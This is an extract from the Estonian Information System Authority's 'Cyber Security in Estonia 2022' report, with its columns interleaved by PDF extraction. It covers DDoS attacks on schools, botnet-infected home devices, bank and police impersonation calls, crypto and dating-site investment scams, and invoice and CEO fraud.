The number of DDoS attacks is growing From the summer of 2020, we also collect automatic notifications of denial-of-service attacks without a significant impact, which are clearly on the rise. 50 40 30 20 10 May June July Aug Sept Oct Nov Dec Jan Feb Mar Apr May June July Aug Sept Oct Nov Dec 2020 2021 te that they needed money for their daughter’s ments almost every day. Some of them did not surgery and had ran out of other ideas to earn have a significant impact, but some of the attacks the money they needed. disrupted the daily work of the schools: it was The methods, scale, and impact of the attacks not possible to add or view lesson plans, grades, varied, but the victims were united by the deci- absences, teaching materials, and take tests. sion not to submit to extortion. The fact that the There were also attacks that affected other aut- business plan of the criminals did not work was horities that used the same network or name ser- probably the reason why ransom denial-of-ser- vers in addition to the target school. vice attacks almost disappeared after the first A young person might think that by ordering quarter. an attack on their school, they could avoid taking a test or could skip school without anyone ATTACKS ON SCHOOLS noticing. An adult, however, knows that this is They were replaced by a new problem: attacks not the case. on schools and the Tahvel and Moodle learning information systems. These attackers were not DEVICES LOCATED IN ESTONIA ARE motivated by the desire to get rich – as far as we ALSO USED FOR ATTACKS know, there have been no attacks on educational In most cases, foreign devices are used in denial- institutions that involved a financial demand. of-service attacks against our e-services, but Instead, we suspect that students in the same when analysing incidents, we have also found school who had not prepared for a test or did not Estonian IP addresses. Their owners may not be want to go to school were behind the attacks. The aware that their router, printer, or security attacks on schools or learning information sys- camera is infected with malware, is connected tems usually took place during school hours. into a botnet, and attempts to ‘take down’ their They disappeared during weekends and school home bank or the school of their children. To breaks, and returned when school began again. prevent safe-looking devices from becoming a In September, we received reports of denial- dangerous tool in the hands of cybercriminals, of-service attacks on schools or learning environ- always make sure to update their software. ● Cyber Security in Estonia 2022 23
Financial Fraud Has Become More Diverse Last year, we received 20% more reports of fraud than the year before about incidents in which Estonian people and companies lost money. The Information System Authority (RIA) only sees the tip of the iceberg, because victims of financial fraud turn primarily to the police. W hile attempts are still being made Although both the police and the Estonian to defraud companies of money Banking Association have worked hard to raise with various invoice frauds, last awareness of the problem (see, for example, the year stood out with the number campaign page eiaitah.ee) and it has also been of frauds against individuals. This may be due to widely covered in the media, there are still people having more money on their account as a many people who believe the callers and end up result of the pension reform and the pandemic losing their savings. The figures speak for them- situation, as well as the growing interest in cryp- selves: according to the police, in the first ten tocurrencies. At the same time, the fraudsters months of the year, people lost 2.8 million are evolving rapidly and successfully using psy- euros in this way. The fraudsters were most chological manipulation techniques. In addi- active during autumn. tion, they have always been able to reap the ben- At the end of 2021, there was also a wave of efits of changing circumstances. calls imitating the police: the caller claims to be from the Estonian police and informs the per- FRAUDULENT CALLS son that a large loan has been taken on their FROM THE BANK AND THE POLICE behalf, or asks for information about a third Much of the reports we receive about financial party and then informs the person that the fraud against individuals still involve fraudu- bank account of the person has been hacked. lent calls on behalf of a bank. The caller is usu- The purpose of the call is to phish the personal ally a Russian-speaking person, but at the end identification code and other data that can be of the year, there was also a trend where the used to carry out frauds. conversation was started in Estonian and only The fraudsters try various techniques to then handed over to a Russian-speaking ‘cus- increase their credibility, such as mentioning tomer service representative’. The purpose of their police token number. Behind these calls is the calls is to find out the PINs of the person an internationally organised network whose and use them to clear the bank account. call centres make thousands of calls a day and 24 Cyber Security in Estonia 2022
constantly seek to make them more credible to generate revenue. CRYPTOCURRENCY FRAUDS ARE A RISING TREND Frauds also have Various frauds related to cryptocurrencies, the indirect victims losses of which ranged from a few hundred euros In addition to direct financial loss, invoice fraud to almost 100,000 euros, were a growing trend can also have indirect victims whose business last year. The most typical were cases where a or reputation may be temporarily damaged. In person had created an account and started oper- 2021, there was an example of a company in ating on a cryptocurrency trading platform, but the medical sector, whose name and details found that later it was no longer possible to with- were used to send fake invoices to partners in draw the money. It often turned out to be a fake the same field. This temporarily damaged the platform − a temporary environment specially good name of the company and also caused created by criminals to entice people to make delays in receiving payments, as partners no transactions there. After a while, the platform longer knew which invoices to trust and which was closed and the money was stolen. not. Various frauds related to cryptocurrencies, the losses of which ranged from a few hundred euros to almost 100,000 euros, were a growing trend last year. ❱ Cyber Security in Estonia 2022 25
An example of a classic CEO fraud It is relatively easy to carry out this type of In addition to fake platforms, we also received fraud scheme, as the regulation of cryptocur- reports of criminals breaking into a crypto wal- rencies is still under development all over the let of a person (the application where crypto world (a bill regulating the respective field in assets were stored) and stealing the contents. Estonia is expected to be approved this spring). The average reported loss was around a few So far, almost anyone can create or buy a trad- thousand euros. Well-known applications, such ing environment for cryptocurrencies, buy fake as MetaMask, are not inherently unsafe, but users and followers, and advertise it on influen- they are vulnerable to common threats such as tial social media channels. While the initial rec- weak passwords, security vulnerabilities in ommendation before purchasing any crypto- applications such as web browsers, or the user currency or joining any environment is always accidentally entering their own crypto keys on a to do a thorough background check, it may not phishing site. While in the case of banks, the be enough – fake platforms may have fake user responsibility of the bank for depositing money reviews and negative feedback from deceived is very clearly regulated and depositors are pro- customers may not reach the forums until it is tected by law, theft in the crypto world usually too late. In addition, there are criminals also means the permanent loss of one’s assets. following the forums and rushing ‘to help’ those who have lost money and direct them to new INVESTMENT ADVICE FROM TINDER? phishing sites or fake environments. Many of the frauds we found out about were linked to a specific scheme. In this scheme, vic- tims meet the fraudster on a dating platform – Upistic disappeared often on Tinder or Facebook Dating. After some time, the ‘beautiful Asian girl’ or ‘young French with the money man’ starts talking about investment opportu- of the investors nities that they have used to improve their lives In the last two months of the year, we received and on which they have been consulted by a reports about the environment upistic.com, ‘relative working in the finance field’. which advertised itself as the leading provider The conversation was often not intrusive at of crypto investment services in Estonia and all and the topic was casually mentioned while attracted investors from all over the world. talking about their daily activities. These fraud- However, the environment stopped working and sters often wait for the victims to become inter- investors, mostly foreigners, lost their money. In ested and start asking additional questions. the cases reported to us, the damages ranged Once they got to know each other more and from a few hundred to a few thousand euros. some trust was established, the new acquaint- 26 Cyber Security in Estonia 2022
ance agreed to share their investment recom- The story of one fraud mendations, helped create an account in a spe- Martin is a successful middle-aged entrepre- cially designed environment, and showed how neur who works in the field of consulting and the initial investment was earning good profit. communicates with a large number of people Over time, they encouraged the victim to in Estonia and abroad. One day, he received invest ever-increasing amounts of money. a Facebook friend request from a lady who However, when the person wanted to take out introduced herself as a representative of the the investment, it proved impossible. It was international fashion industry. She said she essentially an investment fraud, but instead of had been on holiday in Estonia and was looking aggressive telephone sales, contact was made for marketing contacts here. Her communica- on a dating platform and the fraudster spent tion style was polite and professional. In time to get to know the victim. addition, she sent Martin materials related to her professional work and was not in any THERE WERE FEWER FAKE way intrusive. The lady also talked about her INVOICES THIS YEAR background and achievements and sent 2021 broke the record with two attempts to pictures – nothing seemed suspicious. commit invoice fraud, the figures of which were After several weeks of communication, unprecedented in Estonia. Fortunately, they she mentioned her experience in crypto and remained only attempts. The largest of these her plans for specific transactions. As Martin took place in the early summer, when criminals was also interested in the field, he asked for began to monitor the e-mail exchange of a large more information and received references and Estonian company with a cooperation partner links to various environments. Martin checked abroad. At the appropriate time, they inter- them and found no indications that the vened and presented fake invoices for a total of environments were fake. several million euros on behalf of the partner. Martin then decided to invest 1,000 euros The e-mail filter system of the company dis- in crypto, which started to make a profit, and covered the fraud fairly quickly and no losses initially, he was able to grow his investment. were incurred. The Estonian company also did Encouraged by the positive experience, not find any signs of a break-in in its e-mail sys- he made two additional investments. tem, so it could be assumed that the mailbox of At one point, however, Martin said his the cooperation partner located in Central ‘intuition awoke’ and when he tried to transfer Europe had been compromised. the earned money back to his crypto account, The second case took place at the beginning it failed. In total, Martin lost 8,000 euros. The of the year, when the attentive staff of a con- police says there is not much hope to get it struction company was able to prevent a similar back and Martin will have to take it as a lesson. attempt to commit invoice fraud for 900,000 As for money and investment, his advice is to euros. Both of these cases show that appropri- be very careful with any new contacts and not ate protection measures and staff awareness of to trust their advice, no matter how skilfully the most common scams pay off indeed. presented. There were some successful invoice frauds too in 2021. To our knowledge, the largest amount lost was 35,000 euros. or a member of the management board request- In addition to the way described above, where ing an urgent transfer to a foreign bank account. fraud is carried out by breaking into the system In at least one case, the transfer was made and and hijacking the e-mail conversation, the clas- 15,000 euros reached the account of the fraud- sic CEO frauds are also still used. In December, ster. However, general awareness of this type of a dozen companies informed us that their fraud has grown over the years and there are accountant had received a letter from the CEO fewer cases of major financial losses. ● Cyber Security in Estonia 2022 27
You can also read